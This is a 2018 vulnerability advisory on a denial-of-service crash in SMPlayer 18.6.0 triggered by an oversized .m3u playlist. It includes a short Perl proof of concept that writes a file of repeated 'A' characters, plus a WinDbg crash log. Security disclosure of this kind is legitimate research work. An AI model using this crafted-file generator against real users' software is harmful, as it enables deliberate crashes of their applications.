SMPlayer 18.6.0 - Memory Corruption (DoS) Vulnerability

fr ZwX (FR) fr
Risk: Low
Local: Yes
Remote: No

Document Title: =============== SMPlayer 18.6.0 - Memory Corruption (DoS) Vulnerability References (Source): ==================== Release Date: ============= 2018-07-23 Vulnerability Laboratory ID (VL-ID): ==================================== 2138 Common Vulnerability Scoring System: ==================================== 4.4 Vulnerability Class: ==================== Denial of Service Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== SMPlayer is a free multimedia player for Windows and Linux with built-in codecs that can play virtually any video and audio format. It does not need any additional codecs. Install SMPlayer with ease and you'll be able to instantly play all audio and video formats without having to search for and install additional codecs. (Copy of the Vendor Homepage: Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a memory corruption vulnerability in the official SMPlayer v18.6.0 software. Vulnerability Disclosure Timeline: ================================== 2018-07-23: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Local Severity Level: =============== Medium Authentication Type: ==================== Restricted authentication (user/moderator) - User privileges User Interaction: ================= No User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A memory corruption vulnerability resulting in a denial of service has been discovered in the official SMPlayer v18.6.0 software. The vulnerability is caused by an invalid pointer corruption while processing a corrupted .m3u file through the SMPlayer reader. Which could be exploited by attackers to crash a complete software process via denial of service. The vulnerability is located in the Qt5Core.dll when processing an .m3u file on import. Vulnerable Modules: [+] Open [+] File [+] Reading Proof of Concept (PoC): ======================= The vulnerability can be exploited by local attackers via import or by remote attackers via user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below. PoC: Exploitation (Perl) #!/usr/bin/perl my $Buff = "A" x 122200; open(MYFILE,'>>Corruption.m3u'); print MYFILE $Buff; close(MYFILE); print " POC Created by ZwX"; --- PoC Debug Session Logs (Windbg) --- EXCEPTION_RECORD: (.exr -1) ExceptionAddress: 68b724d9 (Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile+0x000005f9) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 020ffffe Attempt to write to address 020ffffe FAULTING_THREAD: 00000994 DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE PROCESS_NAME: smplayer.exe FOLLOWUP_IP: Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile+5f9 68b724d9 66895702 mov word ptr [edi+2],dx WRITE_ADDRESS: 020ffffe ERROR_CODE: (NTSTATUS) 0xc0000005 - <Unable to get error code text> EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - <Unable to get error code text> EXCEPTION_CODE_STR: c0000005 EXCEPTION_PARAMETER1: 00000001 EXCEPTION_PARAMETER2: 020ffffe WATSON_BKT_PROCSTAMP: 5b2f993b WATSON_BKT_PROCVER: PROCESS_VER_PRODUCT: SMPlayer for Windows (32-bit) WATSON_BKT_MODULE: Qt5Core.dll WATSON_BKT_MODSTAMP: 5715839e WATSON_BKT_MODOFFSET: f24d9 WATSON_BKT_MODVER: MODULE_VER_PRODUCT: Qt5 BUILD_VERSION_STRING: 7601.24168.x86fre.win7sp1_ldr.180608-0600 MODLIST_WITH_TSCHKSUM_HASH: ec621d6b16ea647fcad270b607987d6790c6372e MODLIST_SHA1_HASH: 22b51cf1164db3537920237889937f627826c434 NTGLOBALFLAG: 70 PROCESS_BAM_CURRENT_THROTTLED: 0 PROCESS_BAM_PREVIOUS_THROTTLED: 0 APPLICATION_VERIFIER_FLAGS: 0 PRODUCT_TYPE: 1 SUITE_MASK: 784 DUMP_TYPE: fe ANALYSIS_SESSION_TIME: 07-20-2018 16:01:44.0461 ANALYSIS_VERSION: 10.0.17134.12 x86fre THREAD_ATTRIBUTES: OS_LOCALE: FRA PROBLEM_CLASSES: ID: [0n309] Type: [@ACCESS_VIOLATION] Class: Addendum Scope: BUCKET_ID Name: Omit Data: Omit PID: [Unspecified] TID: [0x994] Frame: [0] : Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile ID: [0n282] Type: [INVALID_POINTER_WRITE] Class: Primary Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix) BUCKET_ID Name: Add Data: Omit PID: [Unspecified] TID: [0x994] Frame: [0] : Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT LAST_CONTROL_TRANSFER: from 68b552b9 to 68b724d9 STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 0022c968 68b552b9 00000023 0022ca38 0022ca08 Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile+0x5f9 0022c9c8 68b72b3c 00000003 00000000 037ef398 Qt5Core!ZN5QFile4openE6QFlagsIN9QIODevice12OpenModeFlagEE+0x59 0022ca58 68b94738 0022cab8 0022cae0 00000000 Qt5Core!ZN14QTemporaryFile4openE6QFlagsIN9QIODevice12OpenModeFlagEE+0x2c 0022cae8 68b94d99 00000000 00000000 00666c30 Qt5Core!ZN9QSettings5eventEP6QEvent+0x378 0022cb18 00445290 0022cb7c 00000000 00000000 Qt5Core!ZN9QSettings5eventEP6QEvent+0x9d9 0022cba8 004502ad 0022cbdc 00000002 027b14d8 smplayer+0x45290 0022cc08 0046961a 027b4388 0022cd38 00000007 smplayer+0x502ad 0022cc88 0046ad1c 0022cd38 0022cd3c 00000004 smplayer+0x6961a 0022cd68 0046bfea 0022cdb8 00000000 0022cda8 smplayer+0x6ad1c 0022cdd8 68c15612 027b1430 00000000 00000022 smplayer+0x6bfea 0022ce78 004c08cc 027b8a48 00000007 00000000 Qt5Core!ZN11QMetaObject8activateEP7QObjectiiPPv+0x212 0022cf18 004c98e1 00000000 00000000 00000000 smplayer+0xc08cc 0022d058 004f97f0 0022d0ac 00000002 00686bc4 smplayer+0xc98e1 0022d0d8 00501901 0022d1a4 021d56f0 0022d128 smplayer+0xf97f0 0022d1d8 00523690 00000000 00000000 000002aa smplayer+0x101901 0022d228 68c15612 021d56f0 00000000 0000000b smplayer+0x123690 0022d2c8 00cb4238 02874d38 00000003 00000001 Qt5Core!ZN11QMetaObject8activateEP7QObjectiiPPv+0x212 0022d2f8 00e2bfb0 00000000 68d2c200 00000000 Qt5Widgets!ZN7QAction8activateENS_11ActionEventE+0x98 0022d398 00e2a9de 0022d3d0 00000000 00000420 Qt5Widgets!ZN5QMenu18setToolTipsVisibleEb+0x2a0 0022d3a8 77156370 00000000 00000000 000000dc Qt5Widgets!ZN5QMenu7hoveredEP7QAction+0xd1e 0022d498 00e360ba 0022d820 021574e8 0000000c ntdll!RtlpFreeHeap+0xb7a 0022d4a8 6aa8f5f1 021181e0 0000000c 0022d518 Qt5Widgets!ZN5QMenu5eventEP6QEvent+0x11a 0022d4b8 68a9e6af 0000001b 0371e2f8 00000010 qwindows+0xf5f1 0022d518 61b76f8b 0022d820 00000000 00000048 Qt5Core!ZN7QThread21setTerminationEnabledEb+0x4af 0022d538 00cbfcc1 028b7ae0 0022d820 0022d848 Qt5Gui!ZNK11QMouseEvent5flagsEv+0xb 0022d5a4 771c5c6e 02148bc0 00000001 00000000 Qt5Widgets!ZN12QApplication6notifyEP7QObjectP6QEvent+0xb51 0022d5d4 771c6c18 00360138 00000029 0000000f ntdll!RtlpValidateHeap+0x20 0022d678 61b69e7a 0212a8a8 00000000 00000000 ntdll!RtlDebugFreeHeap+0x276 0022d6a8 68bf5259 028b7ae0 0022d820 0022d77c Qt5Gui!ZNK7QWindow8geometryEv+0x1ba 0022d6f8 00cbe96c 028b7ae0 0022d820 02957d40 Qt5Core!ZN16QCoreApplication15notifyInternal2EP7QObjectP6QEvent+0x109 0022d898 00d1537a 0022dbb0 0022dbb0 00000000 Qt5Widgets!ZN19QApplicationPrivate14sendMouseEventEP7QWidgetP11QMouseEventS1_S1_PS1_R8QPointerIS0_Eb+0x1dc 0022d8c8 68bf4cef 00000000 03766523 00000000 Qt5Widgets!ZN14QDesktopWidget11qt_metacallEN11QMetaObject4CallEiPPv+0x48ba 0022fe38 005d7d52 00000001 02142fb8 009751a0 Qt5Core!ZN23QCoreApplicationPrivate29threadRequiresCoreApplicationEv+0xf 0022fe98 00635f1d 00400000 00000000 00962598 smplayer+0x1d7d52 0022feb8 004013e2 00363aa8 00000019 00000001 smplayer+0x235f1d 0022ff88 7560efac 7ffd3000 0022ffd4 77163628 smplayer+0x13e2 0022ff94 77163628 7ffd3000 77dd4275 00000000 kernel32!BaseThreadInitThunk+0x12 0022ffd4 771635fb 004014c0 7ffd3000 00000000 ntdll!__RtlUserThreadStart+0x70 0022ffec 00000000 004014c0 7ffd3000 00000000 ntdll!_RtlUserThreadStart+0x1b STACK_COMMAND: ~0s ; .cxr ; kb THREAD_SHA1_HASH_MOD_FUNC: ad89141657ca48c6d034b3799d071b71260125cc THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 83a292b67a1ed4f6616c9779d9411dcb769f07bc THREAD_SHA1_HASH_MOD: 87d5f5752469a4414a8f7facb8849b26ec792c75 FAULT_INSTR_CODE: 2578966 SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile+5f9 FOLLOWUP_NAME: MachineOwner MODULE_NAME: Qt5Core IMAGE_NAME: Qt5Core.dll DEBUG_FLR_IMAGE_TIMESTAMP: 5715839e FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_Qt5Core.dll!ZN14QTemporaryFile16createNativeFileER5QFile BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_Qt5Core!ZN14QTemporaryFile16createNativeFileER5QFile+5f9 FAILURE_EXCEPTION_CODE: c0000005 FAILURE_IMAGE_NAME: Qt5Core.dll BUCKET_ID_IMAGE_STR: Qt5Core.dll FAILURE_MODULE_NAME: Qt5Core BUCKET_ID_MODULE_STR: Qt5Core -------------------------------------- 0:000> lmvm Qt5Core Browse full module list start end module name 68a80000 68faf000 Qt5Core (export symbols) C:SMPlayerQt5Core.dll Loaded symbol image file: C:SMPlayerQt5Core.dll Image path: C:SMPlayerQt5Core.dll Image name: Qt5Core.dll Browse all global symbols functions data Timestamp: Mon Apr 18 18:02:22 2016 (5715839E) CheckSum: 0052E947 ImageSize: 0052F000 File version: Product version: File flags: 0 (Mask 3F) File OS: 4 Unknown Win32 File type: 2.0 Dll File date: 00000000.00000000 Translations: 0409.04b0 Information from resource tables: CompanyName: The Qt Company Ltd ProductName: Qt5 OriginalFilename: Qt5Core.dll ProductVersion: FileVersion: FileDescription: C++ application development framework. LegalCopyright: Copyright (C) 2015 The Qt Company Ltd. Security Risk: ============== The security risk of the memory corruption that occurs by an invalid pointer write on import is estimated as medium. Credits & Authors: ================== ZwX - Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: - - Programs: - - Feeds: - - Social: - - Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018,


Back to Top